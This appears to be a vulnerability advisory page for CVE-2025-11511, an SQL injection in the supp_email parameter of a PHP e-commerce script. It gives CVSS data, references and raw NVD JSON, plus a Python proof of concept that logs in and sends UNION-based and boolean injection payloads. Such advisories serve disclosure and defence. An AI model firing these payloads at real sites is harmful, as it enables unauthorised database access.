CVE-2025-11511

Description

A flaw has been found in code-projects E-Commerce Website 1.0. Affected is an unknown function of the file /pages/supplier_add.php. Executing manipulation of the argument supp_email can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:e-commerce_website:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects E-Commerce Website 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11511 SQL Injection PoC
# Target: code-projects E-Commerce Website 1.0
# Vulnerable file: /pages/supplier_add.php
# Vulnerable parameter: supp_email

import requests

# Target configuration
TARGET_URL = "http://target-ecommerce.com/pages/supplier_add.php"
USERNAME = "test_user"  # Low privilege account required
PASSWORD = "test_password"

# Step 1: Login to obtain session cookie
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post("http://target-ecommerce.com/login.php", data=login_data)

# Step 2: Craft SQL injection payload
# Using UNION-based injection to extract database version
sql_payload = "' UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10-- -"

# Step 3: Send malicious request with injected supp_email parameter
injection_data = {
    "supp_name": "Test Supplier",
    "supp_email": sql_payload,
    "supp_contact": "1234567890",
    "supp_address": "Test Address",
    "submit": "Add Supplier"
}

response = session.post(TARGET_URL, data=injection_data)

# Step 4: Check response for leaked database information
if "MySQL" in response.text or "MariaDB" in response.text:
    print("[+] SQL Injection successful!")
    print("[+] Database information leaked in response")
else:
    print("[-] Injection attempt failed or database type unknown")

# Alternative: Boolean-based blind injection payload
blind_payload = "' OR 1=1-- -"
blind_data = {
    "supp_name": "Test",
    "supp_email": blind_payload,
    "supp_contact": "1234567890",
    "supp_address": "Test",
    "submit": "Add"
}
response_blind = session.post(TARGET_URL, data=blind_data)
print(f"[+] Blind injection response status: {response_blind.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11511
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11511
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11511/
[4] VulDB https://vuldb.com/cve/CVE-2025-11511
[5] https://code-projects.org/
[6] https://github.com/Blowingwinds/cve-report/blob/main/cve4/report.md
[7] https://vuldb.com/?ctiid.327635
[8] https://vuldb.com/?id.327635
[9] https://vuldb.com/?submit.669489
[10] https://github.com/Blowingwinds/cve-report/blob/main/cve4/report.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11511", "sourceIdentifier": "[email protected]", "published": "2025-10-08T23:15:31.163", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects E-Commerce Website 1.0. Affected is an unknown function of the file /pages/supplier_add.php. Executing manipulation of the argument supp_email can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:e-commerce_website:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8DF9909B-C71B-41A0-B872-842A77B5B3EC"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Blowingwinds/cve-report/blob/main/cve4/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327635", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327635", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.669489", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/Blowingwinds/cve-report/blob/main/cve4/report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}